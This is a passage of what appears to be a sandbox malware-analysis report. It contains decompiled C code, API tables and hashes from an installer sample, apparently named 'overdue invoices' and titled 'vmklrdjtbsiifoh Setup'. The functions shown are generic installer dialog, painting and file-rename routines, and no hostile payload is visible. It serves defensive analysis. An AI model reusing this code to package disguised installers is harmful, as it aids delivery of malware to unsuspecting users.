										__eflags =  *0x423f2c - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133) {
							_t142 =  *0x423678 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x421498 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                  0x0040396d
                  0x00403976
                  0x00403ab7
                  0x00403abb
                  0x00403abf
                  0x00403ac1
                  0x00403ac6
                  0x00403ad1
                  0x00403adc
                  0x00403ae1
                  0x00403ae3
                  0x00403ae5
                  0x00403ae8
                  0x00403aed
                  0x00403afb
                  0x00403b08
                  0x00403b0f
                  0x00403b0f
                  0x00403b10
                  0x00403b10
                  0x00403b15
                  0x00403b1b
                  0x00403b22
                  0x00403b28
                  0x00403b2a
                  0x00403b6a
                  0x00403b6f
                  0x00403b74
                  0x00403b74
                  0x00403b79
                  0x00403b82
                  0x00403b84
                  0x00403b89
                  0x00403b8f
                  0x00403b93
                  0x00403b93
                  0x00403b98
                  0x00403b9e
                  0x00000000
                  0x00000000
                  0x00403ba4
                  0x00403ba9
                  0x00403baf
                  0x00000000
                  0x00000000
                  0x00403bb8
                  0x00403bc0
                  0x00403bc5
                  0x00403bc8
                  0x00403bce
                  0x00403bd3
                  0x00403bd6
                  0x00403bdc
                  0x00403be1
                  0x00403be4
                  0x00403bea
                  0x00403bf2
                  0x00403bf8
                  0x00403bfe
                  0x00403c02
                  0x00403c09
                  0x00403c09
                  0x00403c09
                  0x00403c13
                  0x00403c25
                  0x00403c31
                  0x00403c36
                  0x00403c40
                  0x00403c46
                  0x00403c48
                  0x00403c4d
                  0x00403c4a
                  0x00403c4a
                  0x00403c4a
                  0x00403c5d
                  0x00403c75
                  0x00403c77
                  0x00403c7d
                  0x00403c92
                  0x00403c7f
                  0x00403c88
                  0x00403c8a
                  0x00403c8a
                  0x00403c98
                  0x00403ca8
                  0x00403cb9
                  0x00403cc0
                  0x00403cc6
                  0x00403cca
                  0x00403ccf
                  0x00403cd1
                  0x00000000
                  0x00403cd7
                  0x00403cd7
                  0x00403cd9
                  0x00000000
                  0x00000000
                  0x00403cdf
                  0x00403ce3
                  0x00403d08
                  0x00403d0e
                  0x00403d14
                  0x00403d16
                  0x00000000
                  0x00000000
                  0x00403d3c
                  0x00403d42
                  0x00403d44
                  0x00403d49
                  0x00000000
                  0x00000000
                  0x00403d4f
                  0x00403d52
                  0x00403d55
                  0x00403d6c
                  0x00403d78
                  0x00403d91
                  0x00403d97
                  0x00403d9b
                  0x00403da0
                  0x00403da6
                  0x00000000
                  0x00000000
                  0x00403db0
                  0x00403dbb
                  0x00000000
                  0x00403dbb
                  0x00403ce5
                  0x00403ceb
                  0x00000000
                  0x00000000
                  0x00403cf1
                  0x00403cf7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403cfd
                  0x00403cd1
                  0x00403dc8
                  0x00403dd4
                  0x00403ddb
                  0x00000000
                  0x00403b2c
                  0x00403b2c
                  0x00403b2f
                  0x00403b62
                  0x00403b62
                  0x00403b64
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403b64
                  0x00403b31
                  0x00403b35
                  0x00403b3a
                  0x00403b3c
                  0x00000000
                  0x00000000
                  0x00403b4c
                  0x00403b54
                  0x00000000
                  0x00403b5a
                  0x00403988
                  0x00403988
                  0x0040398c
                  0x00403991
                  0x004039a0
                  0x004039a0
                  0x004039a9
                  0x004039b2
                  0x004039bd
                  0x004039bd
                  0x004039c9
                  0x004039e5
                  0x004039e8
                  0x004039fb
                  0x00403a01
                  0x00403aa4
                  0x00000000
                  0x00403aad
                  0x00403a07
                  0x00403a14
                  0x00403a16
                  0x00403a18
                  0x00403a37
                  0x00403a37
                  0x00403a3a
                  0x00403a3f
                  0x00403a42
                  0x00403a52
                  0x00403a53
                  0x00403a55
                  0x00403a8b
                  0x00403a9e
                  0x00000000
                  0x00403a9e
                  0x00403a57
                  0x00403a5d
                  0x00403a76
                  0x00403a7b
                  0x00403a7d
                  0x00000000
                  0x00000000
                  0x00403a7f
                  0x00403a6b
                  0x00403a6b
                  0x00403a6d
                  0x00403a6d
                  0x00000000
                  0x00403a6d
                  0x00403a60
                  0x00403a65
                  0x00000000
                  0x00403a65
                  0x00403a44
                  0x00403a4a
                  0x00000000
                  0x00000000
                  0x00403a4c
                  0x00000000
                  0x00403a4c
                  0x00403a3c
                  0x00000000
                  0x00403a3c
                  0x00403a22
                  0x00403a29
                  0x00403a2f
                  0x00403a31
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a31
                  0x004039ed
                  0x00000000
                  0x004039cb
                  0x004039d1
                  0x004039db
                  0x00403de1
                  0x00403de7
                  0x00403de9
                  0x00403def
                  0x00403df4
                  0x00403dfa
                  0x00403dfa
                  0x00403def
                  0x00403e04
                  0x00000000
                  0x00403e04
                  0x004039c9

                  APIs
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                  • ShowWindow.USER32(?), ref: 004039BD
                  • DestroyWindow.USER32 ref: 004039D1
                  • SetWindowLongA.USER32 ref: 004039ED
                  • GetDlgItem.USER32 ref: 00403A0E
                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                  • IsWindowEnabled.USER32(00000000), ref: 00403A29
                  • GetDlgItem.USER32 ref: 00403AD7
                  • GetDlgItem.USER32 ref: 00403AE1
                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                  • GetDlgItem.USER32 ref: 00403BF2
                  • ShowWindow.USER32(00000000,?), ref: 00403C13
                  • EnableWindow.USER32(?,?), ref: 00403C25
                  • EnableWindow.USER32(?,?), ref: 00403C40
                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                  • EnableMenuItem.USER32 ref: 00403C5D
                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                  • lstrlenA.KERNEL32(00420498,?,00420498,vmklrdjtbsiifoh Setup), ref: 00403CB1
                  • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                  • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                  • String ID: vmklrdjtbsiifoh Setup
                  • API String ID: 184305955-927670239
                  • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                  • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                  • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                  • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403F7F Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42367c; // 0x563c02
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423ed8; // 0x5626dc
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423eb0; // 0x55dba8
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}





















                  0x00403f8f
                  0x004040b5
                  0x00404111
                  0x00404115
                  0x004041ec
                  0x004041ee
                  0x004041ee
                  0x004041f4
                  0x004041f4
                  0x004041f7
                  0x00000000
                  0x004041fe
                  0x00404123
                  0x00404125
                  0x0040412f
                  0x0040413a
                  0x0040413d
                  0x00404140
                  0x0040414b
                  0x0040414e
                  0x00404155
                  0x00404163
                  0x0040417b
                  0x00404183
                  0x0040418e
                  0x0040419e
                  0x004041a0
                  0x004041a0
                  0x00404155
                  0x004041aa
                  0x00000000
                  0x004041b5
                  0x004041b9
                  0x004041ca
                  0x004041ca
                  0x004041d0
                  0x004041de
                  0x004041de
                  0x00000000
                  0x004041e2
                  0x004041aa
                  0x004040c0
                  0x00000000
                  0x004040d4
                  0x004040d4
                  0x004040da
                  0x004040da
                  0x004040e0
                  0x00000000
                  0x00000000
                  0x00404105
                  0x00404107
                  0x0040410c
                  0x00000000
                  0x0040410c
                  0x004040c0
                  0x00403f95
                  0x00403f98
                  0x00403f9d
                  0x00403f9f
                  0x00403fae
                  0x00403fae
                  0x00403fb0
                  0x00403fb5
                  0x00403fb8
                  0x00403fba
                  0x00403fbf
                  0x00403fc8
                  0x00403fce
                  0x00403fda
                  0x00403fdd
                  0x00403fe6
                  0x00403feb
                  0x00403fee
                  0x00403ff3
                  0x0040400a
                  0x00404011
                  0x00404024
                  0x00404027
                  0x0040403c
                  0x0040403e
                  0x00404043
                  0x00404048
                  0x0040404d
                  0x0040404d
                  0x0040405c
                  0x0040406b
                  0x0040406d
                  0x00404083
                  0x00404092
                  0x00404094
                  0x00000000

                  APIs
                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
                  • GetDlgItem.USER32 ref: 0040401E
                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                  • GetSysColor.USER32(?), ref: 0040404D
                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                  • lstrlenA.KERNEL32(?), ref: 00404075
                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                  • GetDlgItem.USER32 ref: 004040F5
                  • SendMessageA.USER32(00000000), ref: 004040F8
                  • GetDlgItem.USER32 ref: 00404123
                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                  • LoadCursorA.USER32 ref: 00404172
                  • SetCursor.USER32(00000000), ref: 0040417B
                  • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                  • LoadCursorA.USER32 ref: 0040419B
                  • SetCursor.USER32(00000000), ref: 0040419E
                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                  • String ID: @.B$N$open
                  • API String ID: 3615053054-3815657624
                  • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                  • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                  • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                  • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0; // 0x55dba8
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "vmklrdjtbsiifoh Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423ea8; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                  0x0040100a
                  0x00401039
                  0x00401047
                  0x0040104d
                  0x00401051
                  0x0040105b
                  0x00401061
                  0x00401064
                  0x004010f3
                  0x00401089
                  0x0040108c
                  0x004010a6
                  0x004010bd
                  0x004010cc
                  0x004010cf
                  0x004010d5
                  0x004010d9
                  0x004010e4
                  0x004010ed
                  0x004010ef
                  0x004010ef
                  0x00401100
                  0x00401105
                  0x0040110d
                  0x00401110
                  0x00401112
                  0x00401118
                  0x0040111f
                  0x00401126
                  0x00401130
                  0x00401142
                  0x00401156
                  0x00401160
                  0x00401165
                  0x00401165
                  0x00401110
                  0x0040116e
                  0x00000000
                  0x00401178
                  0x00401010
                  0x00401013
                  0x00401015
                  0x00401019
                  0x0040101f
                  0x0040101f
                  0x00000000

                  APIs
                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                  • BeginPaint.USER32(?,?), ref: 00401047
                  • GetClientRect.USER32 ref: 0040105B
                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                  • FillRect.USER32 ref: 004010E4
                  • DeleteObject.GDI32(?), ref: 004010ED
                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                  • SelectObject.GDI32(00000000,?), ref: 00401140
                  • DrawTextA.USER32(00000000,vmklrdjtbsiifoh Setup,000000FF,00000010,00000820), ref: 00401156
                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                  • DeleteObject.GDI32(?), ref: 00401165
                  • EndPaint.USER32(?,?), ref: 0040116E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                  • String ID: F$vmklrdjtbsiifoh Setup
                  • API String ID: 941294808-953259161
                  • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                  • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                  • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                  • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004057D3 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t18 =  *0x423eb0; // 0x55dba8
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                  0x004057d9
                  0x004057e0
                  0x004057e4
                  0x004057ed
                  0x004057f1
                  0x00405930
                  0x00405930
                  0x00000000
                  0x00405930
                  0x004057f1
                  0x004057fd
                  0x00405813
                  0x0040583b
                  0x00405846
                  0x0040584a
                  0x0040586a
                  0x0040586c
                  0x00405871
                  0x0040587b
                  0x00405888
                  0x0040588d
                  0x00405892
                  0x00405896
                  0x00000000
                  0x00000000
                  0x004058a5
                  0x004058a7
                  0x004058b4
                  0x004058b8
                  0x00405929
                  0x0040592a
                  0x00000000
                  0x004058d4
                  0x004058e1
                  0x00405946
                  0x0040594d
                  0x004058f4
                  0x004058f4
                  0x004058f6
                  0x004058ff
                  0x0040590a
                  0x0040591c
                  0x00405923
                  0x00000000
                  0x00405923
                  0x0040594f
                  0x00405950
                  0x00405955
                  0x00405957
                  0x00405964
                  0x00405964
                  0x00405968
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405959
                  0x00405959
                  0x0040595c
                  0x0040595f
                  0x00405960
                  0x00000000
                  0x00405959
                  0x004058ec
                  0x004058f1
                  0x00000000
                  0x004058f1
                  0x004058b8
                  0x00405815
                  0x00405820
                  0x00405829
                  0x0040582d
                  0x00000000
                  0x00000000
                  0x0040582d
                  0x0040593a

                  APIs
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                  • GetShortPathNameA.KERNEL32 ref: 00405829
                  • GetShortPathNameA.KERNEL32 ref: 00405846
                  • wsprintfA.USER32 ref: 00405864
                  • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                  • GlobalFree.KERNEL32 ref: 00405923
                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                    • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                  • String ID: %s=%s$(&B$[Rename]
                  • API String ID: 3772915668-1834469719
